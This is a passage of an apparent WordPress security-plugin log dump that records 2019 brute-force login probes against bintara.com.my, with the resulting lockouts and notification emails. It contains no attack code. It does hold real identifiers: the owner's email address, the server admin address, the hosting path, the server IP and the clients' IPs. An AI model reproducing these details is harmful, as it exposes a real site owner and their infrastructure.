empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY81UnlR@6WyRVzpiDpJwAAABg\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.74.122.254\";s:11:\"REMOTE_PORT\";s:5:\"46298\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY81UnlR@6WyRVzpiDpJwAAABg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078485.9167\";s:12:\"REQUEST_TIME\";s:10:\"1569078485\";}}','notice','2019-09-21 15:08:07','2019-09-21 15:08:06',19200304,20687856,'https://bintara.com.my/blog/wp-login.php',1,0,'103.74.122.254'),(26508,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:08:06\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:08:06\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:08:06\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:08:06\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:08:07','2019-09-21 15:08:06',19285120,20687856,'https://bintara.com.my/blog/wp-login.php',1,0,'103.74.122.254'),(26509,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:08:07','2019-09-21 15:08:06',19492176,20687856,'https://bintara.com.my/blog/wp-login.php',1,0,'103.74.122.254'),(26510,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY9CknlR@6WyRVzpiDpdwAAAAw\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"167.99.70.191\";s:11:\"REMOTE_PORT\";s:5:\"35326\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY9CknlR@6WyRVzpiDpdwAAAAw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078538.0999\";s:12:\"REQUEST_TIME\";s:10:\"1569078538\";}}','notice','2019-09-21 15:08:59','2019-09-21 15:08:58',19196688,20685568,'https://bintara.com.my/wp/wp-login.php',1,0,'167.99.70.191'),(26511,0,'lockout','host-lockout::167.99.70.191','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"167.99.70.191\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:08:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:08:58\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:08:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:08:58\";s:12:\"lockout_host\";s:13:\"167.99.70.191\";}','action','2019-09-21 15:08:59','2019-09-21 15:08:58',19282424,20685568,'https://bintara.com.my/wp/wp-login.php',1,0,'167.99.70.191'),(26512,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:13:\"167.99.70.191\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:08:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:08:58\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:08:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:08:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:08:59','2019-09-21 15:08:58',19282376,20685568,'https://bintara.com.my/wp/wp-login.php',1,0,'167.99.70.191'),(26513,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:08:59','2019-09-21 15:08:58',19490752,20685568,'https://bintara.com.my/wp/wp-login.php',1,0,'167.99.70.191'),(26514,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY9CknlR@6WyRVzpiDpeAAAABI\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"54.191.160.201\";s:11:\"REMOTE_PORT\";s:5:\"41316\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY9CknlR@6WyRVzpiDpeAAAABI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078538.1763\";s:12:\"REQUEST_TIME\";s:10:\"1569078538\";}}','notice','2019-09-21 15:08:59','2019-09-21 15:08:58',19199648,20687848,'https://bintara.com.my/wordpress/wp-login.php',1,0,'54.191.160.201'),(26515,0,'lockout','host-lockout::54.191.160.201','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"54.191.160.201\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:08:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:08:58\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:08:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:08:58\";s:12:\"lockout_host\";s:14:\"54.191.160.201\";}','action','2019-09-21 15:08:59','2019-09-21 15:08:58',19285264,20687848,'https://bintara.com.my/wordpress/wp-login.php',1,0,'54.191.160.201'),(26516,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:14:\"54.191.160.201\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:08:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:08:58\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:08:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:08:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:08:59','2019-09-21 15:08:58',19285208,20687848,'https://bintara.com.my/wordpress/wp-login.php',1,0,'54.191.160.201'),(26517,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:08:59','2019-09-21 15:08:58',19492800,20687848,'https://bintara.com.my/wordpress/wp-login.php',1,0,'54.191.160.201'),(26518,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY9EnkXpgmG5P@iB8lF0gAAAIM\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.239.113\";s:11:\"REMOTE_PORT\";s:5:\"58162\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY9EnkXpgmG5P@iB8lF0gAAAIM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569078546.7405\";s:12:\"REQUEST_TIME\";s:10:\"1569078546\";}}','notice','2019-09-21 15:09:08','2019-09-21 15:09:07',19200536,20689872,'https://bintara.com.my/2019/wp-login.php',1,0,'188.166.239.113'),(26519,0,'lockout','host-lockout::188.166.239.113','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:15:\"188.166.239.113\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:09:07\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:09:07\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:09:07\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:09:07\";s:12:\"lockout_host\";s:15:\"188.166.239.113\";}','action','2019-09-21 15:09:08','2019-09-21 15:09:07',19286240,20689872,'https://bintara.com.my/2019/wp-login.php',1,0,'188.166.239.113'),(26520,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";s:15:\"188.166.239.113\";s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:09:07\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:09:07\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:09:07\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:09:07\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:09:08','2019-09-21 15:09:07',19286184,20689872,'https://bintara.com.my/2019/wp-login.php',1,0,'188.166.239.113'),(26521,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:09:08','2019-09-21 15:09:07',19493704,20689872,'https://bintara.com.my/2019/wp-login.php',1,0,'188.166.239.113'),(26522,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY9K0nlR@6WyRVzpiDplQAAAA4\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"109.87.200.193\";s:11:\"REMOTE_PORT\";s:5:\"48520\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY9K0nlR@6WyRVzpiDplQAAAA4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569078571.469\";s:12:\"REQUEST_TIME\";s:10:\"1569078571\";}}','notice','2019-09-21 15:09:32','2019-09-21 15:09:31',19200304,20687856,'https://bintara.com.my/test/wp-login.php',1,0,'109.87.200.193'),(26523,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:3;s:4:\"user\";i:4;s:6:\"period\";i:600;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 23:09:31\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 15:09:31\";s:14:\"lockout_expire\";s:19:\"2019-09-26 03:09:31\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 19:09:31\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 15:09:32','2019-09-21 15:09:31',19285120,20687856,'https://bintara.com.my/test/wp-login.php',1,0,'109.87.200.193'),(26524,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 15:09:32','2019-09-21 15:09:31',19492176,20687856,'https://bintara.com.my/test/wp-login.php',1,0,'109.87.200.193'),(26525,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 